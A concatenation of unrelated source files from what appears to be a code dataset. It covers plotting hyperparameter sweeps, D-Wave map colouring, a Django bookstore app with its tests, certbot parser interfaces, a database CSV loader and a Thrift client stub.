y_1.append(np.log10(l1))
z_1.append(setting_overlaps[counter, digit])
# l2 coef = 1e-4
if np.mod(counter,3) == 1:
thresh, l1 = idx_extrct(counter)
x_2.append(thresh)
y_2.append(np.log10(l1))
z_2.append(setting_overlaps[counter, digit])
# l2 coef = 1e-5
if np.mod(counter,3) == 2:
thresh, l1 = idx_extrct(counter)
x_3.append(thresh)
y_3.append(np.log10(l1))
z_3.append(setting_overlaps[counter, digit])
coordinates_1.append({'digit': digit, 'x':x_1,'y':y_1,'z':z_1})
coordinates_2.append({'digit': digit, 'x':x_2,'y':y_2,'z':z_2})
coordinates_3.append({'digit': digit, 'x':x_3,'y':y_3,'z':z_3})
""" Getting the coordinates for plotting test accuracies"""
# There are 54 envs.
# threshold
coordinates_test_1 = []
coordinates_test_2 = []
coordinates_test_3 = []
x_1 = []
y_1 = []
z_1 = []
x_2 = []
y_2 = []
z_2 = []
x_3 = []
y_3 = []
z_3 = []
for counter, hp in enumerate(all_hps):
# l2 coef = 0.001
if np.mod(counter,3) == 0:
thresh, l1 = idx_extrct(counter)
x_1.append(thresh)
y_1.append(np.log10(l1))
z_1.append(jax.device_get(hp['test_accuracy_avg']))
# l2 coef = 1e-4
if np.mod(counter,3) == 1:
thresh, l1 = idx_extrct(counter)
x_2.append(thresh)
y_2.append(np.log10(l1))
z_2.append(jax.device_get(hp['test_accuracy_avg']))
# l2 coef = 1e-5
if np.mod(counter,3) == 2:
thresh, l1 = idx_extrct(counter)
x_3.append(thresh)
y_3.append(np.log10(l1))
z_3.append(jax.device_get(hp['test_accuracy_avg']))
coordinates_test_1 = {'l2': 1e-3, 'x':x_1,'y':y_1,'z':z_1}
coordinates_test_2 = {'l2': 1e-4, 'x':x_2,'y':y_2,'z':z_2}
coordinates_test_3 = {'l2': 1e-5, 'x':x_3,'y':y_3,'z':z_3}
colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)
print(colors)
import plotly.express as px
import pandas as pd
import plotly.graph_objs as go
from plotly.subplots import make_subplots
# import plotly.plotly as py
# import plotly.tools as tls
# from plotly.graph_objs import *
########## l2=0.001 ##########
# np_data = []
# df_digits = []
fig = go.Figure()
colors = ["brown","blue","orange","green","magenta","cyan","yellow","violet","skyblue","cornflowerblue"] # "blue" if digit == 7 else "red"
for digit in [7,8]: # This is to show that you can plot the evolution of whatever digits you want.
for m in range(3):
x = [coordinates_1[digit]['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_1[digit]['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_1[digit]['z'][n] for n in range(18) if np.mod(n,3) == m]
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines', line=dict(color=colors[digit]), name=str(digit)))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Overlap Score'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.update_layout(title_text='Salam', title_font_size=10)
fig.show()
fig = go.Figure()
for digit in range(10): # This is to show that you can plot the evolution of whatever digits you want.
for m in range(3):
x = [coordinates_1[digit]['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_1[digit]['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_1[digit]['z'][n] for n in range(18) if np.mod(n,3) == m]
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines', line=dict(color=colors[digit]), name=str(digit)))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Overlap Score'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# ------------------------ #
fig = go.Figure()
for m in range(3):
x = [coordinates_test_1['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_test_1['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_test_1['z'][n][0].item()*100 for n in range(18) if np.mod(n,3) == m]
# print(x)
# print(y)
# print(z)
# break
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines'
# , line=dict(color="blue" if digit == 7 else "red")
))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Test Accuracy'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# ########## l2=1e-4 ##########
for digit in range(10): # This is to show that you can plot the evolution of whatever digits you want.
for m in range(3):
x = [coordinates_2[digit]['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_2[digit]['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_2[digit]['z'][n] for n in range(18) if np.mod(n,3) == m]
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines', line=dict(color=colors[digit]), name=str(digit)))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Overlap Score'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# fig = go.Figure()
# for digit in range(10):
# fig.add_trace(go.Scatter3d(x=coordinates_2[digit]['x'], y=coordinates_2[digit]['y'], z=coordinates_2[digit]['z'], mode='markers'))#(df_digits[digit], x='agreement', y='log l1', z='overlap'))
# fig.update_layout(scene = dict(
# xaxis_title='Agreement Threshold',
# yaxis_title='Log L1 Coef',
# zaxis_title='Overlap Score'),
# width=700,
# margin=dict(r=20, b=10, l=10, t=10))
# fig.show()
fig = go.Figure()
for m in range(3):
x = [coordinates_test_2['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_test_2['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_test_2['z'][n][0].item()*100 for n in range(18) if np.mod(n,3) == m]
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines'
# , line=dict(color="blue" if digit == 7 else "red")
))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Test Accuracy'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# ########## l2=1e-5 ##########
for digit in range(10): # This is to show that you can plot the evolution of whatever digits you want.
for m in range(3):
x = [coordinates_3[digit]['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_3[digit]['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_3[digit]['z'][n] for n in range(18) if np.mod(n,3) == m]
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines', line=dict(color=colors[digit]), name=str(digit)))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Overlap Score'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# fig = go.Figure()
# for digit in range(10):
# fig.add_trace(go.Scatter3d(x=coordinates_3[digit]['x'], y=coordinates_3[digit]['y'], z=coordinates_3[digit]['z'], mode='markers'))#(df_digits[digit], x='agreement', y='log l1', z='overlap'))
# fig.update_layout(scene = dict(
# xaxis_title='Agreement Threshold',
# yaxis_title='Log L1 Coef',
# zaxis_title='Overlap Score'),
# width=700,
# margin=dict(r=20, b=10, l=10, t=10))
# fig.show()
fig = go.Figure()
for m in range(3):
x = [coordinates_test_3['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_test_3['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_test_3['z'][n][0].item()*100 for n in range(18) if np.mod(n,3) == m]
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines'
# , line=dict(color="blue" if digit == 7 else "red")
))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Test Accuracy'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.show() |
997,774 | 2e5ab912cc4c6852e5a571518f6a0d6dcd013d2d | # modified from code at https://docs.ocean.dwavesys.com/en/stable/examples/map_coloring_full_code.html
import dwavebinarycsp
from neal import SimulatedAnnealingSampler
from dwave.system import DWaveSampler, EmbeddingComposite
import networkx as nx
import matplotlib.pyplot as plt
from datetime import datetime
import pickle
from pprint import pprint
import hybrid
hybrid.logger.setLevel(hybrid.logging.DEBUG)
def backup(expName, samples):
with open("data/"+expName + str(datetime.now()), "wb") as f:
pickle.dump(samples, f)
wa_out = "{2, 3, 4, 5} | {1, 3} | {1, 2, 5, 31, 32} | {1, 5, 6, 7} | {1, 3, 4, 6, 8, 27, 31, 42} | {4, 5, 7, 8, 9, 10} | {4, 6, 10} | {5, 6, 9, 18, 19, 33, 34, 42} | {6, 8, 10, 13, 17, 18} | {6, 7, 9, 13} | {12, 13, 14, 15} | {11, 14, 16} | {9, 10, 11, 17} | {11, 12, 15, 16, 38} | {11, 14, 17, 20, 38} | {12, 14, 38, 40} | {9, 13, 15, 18, 19, 20} | {8, 9, 17, 19} | {8, 17, 18, 20, 33, 36} | {15, 17, 19, 36, 38, 39} | {22, 23, 24} | {21, 23, 24, 46, 47} | {21, 22, 29, 30, 47} | {21, 22} | {26, 27} | {25, 27, 28, 30, 45} | {5, 25, 26, 31, 42, 45} | {26, 29, 30} | {23, 28, 30} | {23, 26, 28, 29, 44, 45} | {3, 5, 27, 32} | {3, 31} | {8, 19, 34, 35, 36, 37} | {8, 33, 37, 41, 42} | {33, 36, 37, 49} | {19, 20, 33, 35, 39, 49} | {33, 34, 35, 43} | {14, 15, 16, 20, 39, 40} | {20, 36, 38, 49} | {16, 38} | {34, 42, 43, 44} | {5, 8, 27, 34, 41, 44, 45} | {37, 41, 44} | {30, 41, 42, 43, 45} | {26, 27, 30, 42, 44} | {22, 47, 48} | {22, 23, 46} | {46} | {35, 36, 39}".replace(" ","")
wa_singlets = wa_out.split("|")
cleaned = []
for singlet in wa_singlets:
cleaned.append(singlet.replace("{","").replace("}","").split(","))
#print(cleaned)
vertices = []
for i in range(1,len(wa_singlets)+1):
vertices.append(str(i))
#print(vertices)
edges = []
for i in range(0, len(cleaned)):
for j in range(len(cleaned[i])):
edges.append((str(i+1), cleaned[i][j]))
#print(edges)
def not_same_color(v,u):
return not (v and u)
one_hot_encoding = {(0,0,0,1), (0,0,1,0), (0,1,0,0), (1,0,0,0)}
colors = len(one_hot_encoding)
def plot_map(sample):
G = nx.Graph()
G.add_nodes_from(vertices)
G.add_edges_from(edges)
# Translate from binary to integer color representation
color_map = {}
for state in vertices:
for i in range(colors):
if sample[state+"_"+str(i)]:
color_map[state] = i
# Plot the sample with color-coded nodes
node_colors = [color_map.get(node) for node in G.nodes()]
nx.draw_planar(G, with_labels=True, node_color=node_colors, node_size=10, cmap=plt.cm.rainbow)
plt.savefig("out.png")
csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
for state in vertices:
variables = [state+"_"+str(i) for i in range(colors)]
csp.add_constraint(one_hot_encoding, variables)
for neighbor in edges:
v,u = neighbor
for i in range(colors):
variables = [v+"_"+str(i), u+"_"+str(i)]
csp.add_constraint(not_same_color, variables)
bqm = dwavebinarycsp.stitch(csp)
workflow = hybrid.Loop(
hybrid.RacingBranches(
hybrid.InterruptableTabuSampler(max_time=0),
hybrid.EnergyImpactDecomposer(size=100, rolling=True, rolling_history=0.3) | hybrid.QPUSubproblemAutoEmbeddingSampler(num_reads=1)| hybrid.SplatComposer()
)| hybrid.ArgMin() ,
convergence=3
)
result = hybrid.HybridSampler(workflow).sample(bqm)
hybrid.Unwind(workflow)
print("Solution: sample={}".format(result.first))
hybrid.print_structure(workflow)
print("-----------------------")
hybrid.print_counters(workflow) |
997,775 | fe885f9ba22f347dd4351a3eb6bc21fc51657978 | fromnetid = 0.6642
rejectmin = 0.99 * fromnetid
rejectlimit = rejectmin + 0.01
f = open('edges.txt', 'r')
fo = open('edges-output.txt', 'w')
count = 0
#PR = float((1.0/685229.0)*(1.0-0.85))
PR = float(1.0/685230.0)
print PR
prevdata = 0
degree = 0
list_output = ''
prevdata1 = 0
flag = 0
tab = '\t'
delim = '\t'
edge_count = 0
for line in f:
line1 = ' '.join(line.split())
data = line1.split(' ')
if len(data) < 3:
print "fucked!"
if not(((float(data[2]) >= float(rejectmin)) and (float(data[2]) < float(rejectlimit)))):
edge_count = edge_count + 1
if (int(data[0]) == int(prevdata)):
degree += 1
list_output += data[1]+delim
continue
elif degree == 0:
list_output += str(prevdata1)+delim
degree = 1
output = str(prevdata)+tab+str(PR)+delim+str(degree)+delim+list_output+"\n"
#print str(output)
fo.write(str(output))
prevdata = data[0]
prevdata1 = data[1]
degree = 0
list_output = ''
if degree == 0:
output = str(data[0])+tab+str(PR)+delim+str(degree+1)+delim+str(data[1])
else:
output = str(data[0])+tab+str(PR)+delim+str(degree)+delim+"\n"
#print str(output)
fo.write(str(output))
print "edge count is"
print edge_count
f.close()
fo.close()
|
997,776 | 0d7f3acce257f314a5e3e67a87e636a012b44573 | class Time(object):
"""Time of day.attributes: hour, minute, second"""
t1 = Time()
t1.hour = 11
t1.minute = 59
t1.second = 30
t2 = Time()
t2.hour = 10
t2.minute = 45
t2.second = 25
def is_after(t1, t2):
t1_total_seconds = (t1.hour * 3600) + (t1.minute * 60) + t1.second
t2_total_seconds = (t2.hour * 3600) + (t2.minute * 60) + t2.second
return t1_total_seconds > t2_total_seconds
print(is_after(t1, t2))
|
997,777 | 0e52356e89e04ac83da42c77eba76e39d1134d1a | from datetime import datetime
from django.shortcuts import render, redirect, get_object_or_404 , reverse
from django.contrib.auth.decorators import login_required
from django.views.generic import ListView, DetailView
from django.db.models import Q
from django.http import JsonResponse
from django.core.paginator import Paginator
import json
from django.core import serializers
from .models import *
from .models import Book
# Create your views here.
@login_required
def profile(request):
order = Order.objects.get(user=request.user, order_completion_status=False)
context = {'order':order}
return render(request, 'profile.html', context)
def about(request):
try:
order = Order.objects.get(user=request.user, order_completion_status=False)
context = {'order':order}
except:
context = {}
return render(request, 'about.html', context)
@login_required
def read(request, pk):
book1 = Book.objects.get(id=pk)
books_bought = []
orders = Order.objects.filter(user=request.user)
for order in orders:
if order.order_completion_status:
orderitems = order.orderitem_set.all()
bought = [item.book.id for item in orderitems]
books_bought +=bought
if pk in books_bought:
context = {'book':book1}
return render(request, 'read.html', context)
else:
context = {'id':pk}
return render(request, 'no_permisson.html', context)
@login_required
def books(request):
books = Book.objects.all()
books_bought = []
try:
orders = Order.objects.filter(user=request.user)
for order in orders:
if order.order_completion_status:
orderitems = order.orderitem_set.all()
bought = [item.book.id for item in orderitems]
books_bought += bought
orders_ongo, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
except:
orders_ongo, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
context = {'books':books, 'order':orders_ongo, 'books_bought':books_bought}
return render(request, 'books/book_list.html', context)
# class BooksListView(ListView):
# model = Book
# context_object_name = "books"
# def get_context_data(self, **kwargs):
# user = get_user_model()
# order, created = Order.objects.get_or_create(user=user.username,order_completion_status=False)
# context = super(BooksListView, self).get_context_data(**kwargs)
# context.update({'get_total_cart_items':order.get_total_cart_items})
# return context
@login_required
def detail(request, pk):
book = Book.objects.get(id=pk)
books_bought = []
try:
orders = Order.objects.filter(user=request.user, order_completion_status=True)
for order in orders:
orderitems = order.orderitem_set.all()
# book_detail =
bought = [item.book.id for item in orderitems]
books_bought += bought
orders, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
except:
orders, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
context = {'book':book, 'order':orders, 'books_bought':books_bought}
return render(request, 'books/book_detail.html', context)
# class BooksDetailView(DetailView):
# model = Book
# context_object_name = "book"
@login_required
def add_to_cart(request, operation, pk):
user = request.user
book = get_object_or_404(Book, id=pk)
order, created = Order.objects.get_or_create(user=user,order_completion_status=False)
orderItem, created = OrderItem.objects.get_or_create(book=book, order=order)
# orderItem.quantity +=1
# orderItem.save()
if operation=="add" or operation=="addition":
orderItem.quantity +=1
elif operation =="remove":
orderItem.quantity -=1
elif operation =="delete":
orderItem.quantity = 0
orderItem.save()
if orderItem.quantity <=0:
orderItem.delete()
if operation=="addition":
return redirect('book-list')
else:
return redirect('checkout')
@login_required
def add_to_cart_ajax(request):
data = json.loads(request.body)
pk= data['itemid']
operation = data['operation']
user = request.user
book = get_object_or_404(Book, id=pk)
order, created = Order.objects.get_or_create(user=user,order_completion_status=False)
orderItem, created = OrderItem.objects.get_or_create(book=book, order=order)
# orderItem.quantity +=1
# orderItem.save()
if operation=="add" or operation=="addition":
orderItem.quantity +=1
elif operation =="remove":
orderItem.quantity -=1
elif operation =="delete":
orderItem.quantity = 0
orderItem.save()
if orderItem.quantity <=0:
orderItem.delete()
cartvalue = {'cartItem':orderItem.quantity, 'total_cart_items':order.get_total_cart_items}
print(cartvalue)
return JsonResponse(cartvalue,safe=False)
def books_not_bought(user):
books = Book.objects.all()
all_books_ids = [book for book in books]
books_not_bought = []
books_bought = []
try:
orders = Order.objects.filter(user=user, order_completion_status=True)
for order in orders:
orderitems = order.orderitem_set.all()
bought = [item.book.id for item in orderitems]
books_bought += bought
for book in all_books_ids:
if book.id in books_bought:
continue
else:
books_not_bought.append(book)
return books_not_bought
except:
pass
return True
@login_required
def checkout(request):
user=request.user
books_not_bought_list = books_not_bought(user)
paginator= Paginator(books_not_bought_list, 3)
books = Book.objects.all()
order, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
orderItems = order.orderitem_set.all()
# paginator= Paginator(books_not_bought_list, 3)
# print('books', paginator.count)
page = paginator.page(1)
context = {'orderItems':orderItems, 'order':order, 'books':books , 'page':page}
details = {}
if request.method == "POST":
for page in paginator.page_range:
book = paginator.page(page)
book_data = book.object_list[0]
details[page]={'id':book_data.id, 'image':book_data.image.url}
if page == 1:
details['prev']=False
else:
details['prev']=True
if page == paginator.num_pages:
details['next']=False
else:
details['next']=True
page_data = json.loads(request.body)
# pages = serializers.serialize('json', [page,])
page_info = {'page':details}
print('bookssssssssssssssssssss', page_data)
return JsonResponse(page_info,safe=False)
return render(request, 'checkout.html', context)
@login_required
def payment(request):
books = Book.objects.all()
order, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
orderItems = order.orderitem_set.all()
context = {'orderItems':orderItems, 'order':order}
if request.method == "POST":
# order, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
order.order_completion_status = True
order.date_of_order=datetime.now()
order.save()
# alert("Payment Success!!")
return redirect('book-list')
return render(request, 'payment.html', context)
@login_required
def completed_orders(request):
orderItems = []
ongoing_order, craeted = Order.objects.get_or_create(user=request.user, order_completion_status=False)
orders = Order.objects.filter(user=request.user, order_completion_status=True)
for order in orders:
orderItemset = order.orderitem_set.all()
for Items in orderItemset:
orderItems.append(Items)
# orderItems = [order.orderitem_set.all() for order in orders]
context = {'orderItems':orderItems, 'order':ongoing_order}
return render(request, 'completed_orders.html', context)
# class SearchResultsView(ListView):
# model = Book
# template_name = "search_results.html"
# context_object_name = 'search_book_results'
# def get_queryset(self):
# query = self.request.GET['val1']
# return Book.objects.filter(title__icontains=query )
@login_required
def search(request):
query = request.GET['search_value']
books = Book.objects.filter(Q(title__icontains = query) | Q(author__icontains = query) )
books_bought = []
try:
orders = Order.objects.filter(user=request.user)
for order in orders:
if order.order_completion_status:
orderitems = order.orderitem_set.all()
bought = [item.book.id for item in orderitems]
books_bought += bought
orders, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
except:
orders, created = Order.objects.get_or_create(user=request.user,order_completion_status=False)
context = {'books':books, 'order':orders, 'books_bought':books_bought}
return render(request, 'search_results.html', context)
# def error_handler(request):
# return redirect('book-list')
def error_404_view(request, execption):
return render(request, 'error_404.html')
def error_handler(request, execption, template_name="error_404.html"):
response.status_code=404
return response |
997,778 | 1954623bcfbd08f7cd9d9af53593217ae861cfd5 | """Repeating a beat in a loop."""
__author__ = "730330944"
# Begin your solution here...
beat: str = input("What beat do you want to repeat? ")
beat_repeat: str = beat
repeat: int = int(input("How many times do you want to repeat it? "))
if(repeat <= 0):
print("No beat...")
else:
while repeat-1 > 0:
beat_repeat += " " + beat
repeat -= 1
print(beat_repeat)
|
997,779 | fb1163e6c30966a80510663a25758826e99d75b3 | from __future__ import print_function, unicode_literals
from clckwrkbdgr import unittest
from clckwrkbdgr.unittest import mock
import os
import mimetypes
from .. import webserver
class MockPopen(object):
def __init__(self, rc, stdout, stderr):
self.rc = rc
self.stdout = stdout
self.stderr = stderr
def communicate(self, stdin):
return self.stdout, self.stderr
def wait(self):
return self.rc
class TestWebResponses(unittest.fs.TestCase):
def setUp(self):
self.setUpPyfakefs(modules_to_reload=[webserver])
self.fs.create_dir('/data')
def should_prepare_base_response(self):
response = webserver.Response(200, b'content', content_type='text/html', content_encoding='utf-8')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'content')
self.assertEqual(response.get_headers(), {'Content-Type':'text/html', 'Content-Encoding':'utf-8'})
def should_prepare_response_from_file(self):
self.fs.create_file('/data/file.md', contents='content')
response = webserver.FileContentResponse(200, '/data/file.md', content_type='text/html', content_encoding='utf-8')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'content')
self.assertEqual(response.get_headers(), {'Content-Type':'text/html', 'Content-Encoding':'utf-8'})
with open('/data/file.md', 'w') as f: f.write('content')
response = webserver.FileContentResponse(200, '/data/file.md')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'content')
expected_content_type, _ = mimetypes.guess_type('/data/file.md')
self.assertEqual(response.get_headers(), {'Content-Type':expected_content_type or 'text/plain'})
self.fs.create_file('/data/file.jpg', contents='content')
response = webserver.FileContentResponse(200, '/data/file.jpg')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'content')
self.assertEqual(response.get_headers(), {'Content-Type':'image/jpeg'})
self.fs.create_file('/data/file.html', contents='<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head><body></body>')
response = webserver.FileContentResponse(200, '/data/file.html')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head><body></body>')
self.assertEqual(response.get_headers(), {'Content-Type':'text/html'})
@mock.patch('subprocess.Popen', side_effect=[
MockPopen(0, b'CONTENT' + os.linesep.encode(), b''),
MockPopen(1, b'', b'ERROR'),
])
@mock.patch('clckwrkbdgr.webserver.base_log_message')
def should_prepare_cgi_response(self, base_log_message, popen):
self.fs.create_file('/data/file.md', contents='content')
response = webserver.CGIResponse(200, '/data/file.md', 'python -c "import six; print(six.moves.input().upper())"')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'CONTENT' + os.linesep.encode())
self.assertEqual(response.get_headers(), {'Content-Type':'text/html', 'Content-Encoding':'utf-8'})
response = webserver.CGIResponse(200, '/data/file.md', 'unknown_command')
self.assertEqual(response.get_code(), 200)
self.assertEqual(response.get_content(), b'')
self.assertEqual(response.get_headers(), {'Content-Type':'text/html', 'Content-Encoding':'utf-8'})
base_log_message.assert_has_calls([
mock.call('CGI process exited with %d', 1),
mock.call('Error during processing CGI:\n%s', str(b'ERROR')),
])
|
997,780 | d454e80535c7a702d97acc28eaf387ed0713e938 | """ Tests for ParserNode interface """
import sys
import pytest
from certbot_apache._internal import interfaces
from certbot_apache._internal import parsernode_util as util
class DummyParserNode(interfaces.ParserNode):
""" A dummy class implementing ParserNode interface """
def __init__(self, **kwargs):
"""
Initializes the ParserNode instance.
"""
ancestor, dirty, filepath, metadata = util.parsernode_kwargs(kwargs)
self.ancestor = ancestor
self.dirty = dirty
self.filepath = filepath
self.metadata = metadata
super().__init__(**kwargs)
def save(self, msg): # pragma: no cover
"""Save"""
pass
def find_ancestors(self, name): # pragma: no cover
""" Find ancestors """
return []
class DummyCommentNode(DummyParserNode):
""" A dummy class implementing CommentNode interface """
def __init__(self, **kwargs):
"""
Initializes the CommentNode instance and sets its instance variables.
"""
comment, kwargs = util.commentnode_kwargs(kwargs)
self.comment = comment
super().__init__(**kwargs)
class DummyDirectiveNode(DummyParserNode):
""" A dummy class implementing DirectiveNode interface """
# pylint: disable=too-many-arguments
def __init__(self, **kwargs):
"""
Initializes the DirectiveNode instance and sets its instance variables.
"""
name, parameters, enabled, kwargs = util.directivenode_kwargs(kwargs)
self.name = name
self.parameters = parameters
self.enabled = enabled
super().__init__(**kwargs)
def set_parameters(self, parameters): # pragma: no cover
"""Set parameters"""
pass
class DummyBlockNode(DummyDirectiveNode):
""" A dummy class implementing BlockNode interface """
def add_child_block(self, name, parameters=None, position=None): # pragma: no cover
"""Add child block"""
pass
def add_child_directive(self, name, parameters=None, position=None): # pragma: no cover
"""Add child directive"""
pass
def add_child_comment(self, comment="", position=None): # pragma: no cover
"""Add child comment"""
pass
def find_blocks(self, name, exclude=True): # pragma: no cover
"""Find blocks"""
pass
def find_directives(self, name, exclude=True): # pragma: no cover
"""Find directives"""
pass
def find_comments(self, comment, exact=False): # pragma: no cover
"""Find comments"""
pass
def delete_child(self, child): # pragma: no cover
"""Delete child"""
pass
def unsaved_files(self): # pragma: no cover
"""Unsaved files"""
pass
interfaces.CommentNode.register(DummyCommentNode)
interfaces.DirectiveNode.register(DummyDirectiveNode)
interfaces.BlockNode.register(DummyBlockNode)
def test_dummy():
"""Dummy placeholder test case for ParserNode interfaces"""
dummyblock = DummyBlockNode(
name="None",
parameters=(),
ancestor=None,
dirty=False,
filepath="/some/random/path"
)
dummydirective = DummyDirectiveNode(
name="Name",
ancestor=None,
filepath="/another/path"
)
dummycomment = DummyCommentNode(
comment="Comment",
ancestor=dummyblock,
filepath="/some/file"
)
if __name__ == "__main__":
sys.exit(pytest.main(sys.argv[1:] + [__file__])) # pragma: no cover
|
997,781 | 0a9985334493d2f2fe5bbd9ea521e825549f9f99 | """
Quick program to add crimes into the database
"""
import csv
import psycopg2
conn = psycopg2.connect(host="localhost",database="DirectedStudiesFall2019", user="postgres", password="REDACTED")
cur = conn.cursor()
with open('random_blocks_with_location.csv', 'r') as f:
reader = csv.reader(f)
next(reader) # Skip the header row.
for row in reader:
cur.execute(
"INSERT INTO random_with_location VALUES (%s, %s, %s, %s,%s, %s, %s)",
row
)
conn.commit()
|
997,782 | 8ed1b87ac8ad54ee9ae36c43de379f776a7a324e | from django.urls import path,include
from post.api.views import PostListAPIView,PostCreatelAPIView,PostDetailAPIView,PostUpdatelAPIView
app_name="post"
urlpatterns = [
path("list",PostListAPIView.as_view(),name="list"),
path("detail/<slug>",PostDetailAPIView.as_view(),name="detail"),
path("update/<slug>",PostUpdatelAPIView.as_view(),name="update"),
path("create",PostCreatelAPIView.as_view(),name="create")
]
|
997,783 | 3b58a3dc2afc8fde0902ccf87f0acf0419edfdc8 | import math
x = int(input("Enter a number between 1-10"))
y = int(input("ENter another number between 1-10"))
cal = x ** y
print(cal)
cal2 = math.sqrt(cal)
print(cal2)
while cal2<100000:
cal2 = cal2+1
if cal2 == 100000:
print(cal2) |
997,784 | 4eea87d00d8e76066af317be19440f8aeb7c1db6 | import turtle as t
#터틀이라는 것을 t로써 가져옴 이를통해 turtle이라고 통째로 안써도 됨
n = 60 # 원을 60번 그림
t.shape('turtle') #모양을 거북이로 변환시킴, 화살표등의 여러가지 있음
t.speed('fastest') # 거북이 속도를 가장 빠르게 설정
for i in range(n):
t.circle(120) # 반지름이 120인 원을 그림
t.right(360 / n)
t.mainloop() #프로그래밍을 실행하고 바로 끝나는걸 방지함
# t.shape('turtle')
# t.speed('fastest') # 거북이 속도를 가장 빠르게 설정
# for i in range(600): # 300번 반복
# t.forward(i) # i만큼 앞으로 이동. 반복할 때마다 선이 길어짐
# t.right(90)
t.mainloop() |
997,785 | 2c2bd5bed50ebc69759323bb6af5aff4850ed966 | #!/usr/bin/env python
#
# Autogenerated by Thrift Compiler (0.7.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
import sys
import pprint
from urlparse import urlparse
from thrift.transport import TTransport
from thrift.transport import TSocket
from thrift.transport import THttpClient
from thrift.protocol import TBinaryProtocol
import INotificationsThriftService
from ttypes import *
if len(sys.argv) <= 1 or sys.argv[1] == '--help':
print ''
print 'Usage: ' + sys.argv[0] + ' [-h host:port] [-u url] [-f[ramed]] function [arg1 [arg2...]]'
print ''
print 'Functions:'
print ' StateResult sendInf(Info info)'
print ' StateResult batchSendInf( infos)'
print ' StateResult markProcessed(string mid)'
print ' StateResult markRead(string mid)'
print ' queryInfo(string appId, string type, string receiverId, string objectId)'
print ' StateResult replaceInf(Info info)'
print ' StateResult batchReplaceInf( infos)'
print ' listAll(string receiverId, string status, i64 from, i32 size)'
print ' listAllOfApp(string appId, string receiverId, string status, i64 from, i32 size)'
print ' listById(string receiverId, string status, i64 mid, i32 count)'
print ' listOfAppById(string appId, string receiverId, string status, i64 mid, i32 count)'
print ' listByTime(string receiverId, string status, i64 from, i32 count)'
print ' listOfAppByTime(string appId, string receiverId, string status, i64 from, i32 count)'
print ' top(string receiverId, string status, i32 topn)'
print ' topOfApp(string appId, string receiverId, string status, i32 topn)'
print ' i32 count(string receiverId, string status)'
print ' i32 countOfApp(string appId, string receiverId, string status)'
print ' string send(string message)'
print ' string batchSend(string messages)'
print ' string process(string mid)'
print ' string query(string appId, string type, string receiverId, string objectId)'
print ' string replace(string message)'
print ' string batchReplace(string messages)'
print ''
sys.exit(0)
pp = pprint.PrettyPrinter(indent = 2)
host = 'localhost'
port = 9090
uri = ''
framed = False
http = False
argi = 1
if sys.argv[argi] == '-h':
parts = sys.argv[argi+1].split(':')
host = parts[0]
port = int(parts[1])
argi += 2
if sys.argv[argi] == '-u':
url = urlparse(sys.argv[argi+1])
parts = url[1].split(':')
host = parts[0]
if len(parts) > 1:
port = int(parts[1])
else:
port = 80
uri = url[2]
if url[4]:
uri += '?%s' % url[4]
http = True
argi += 2
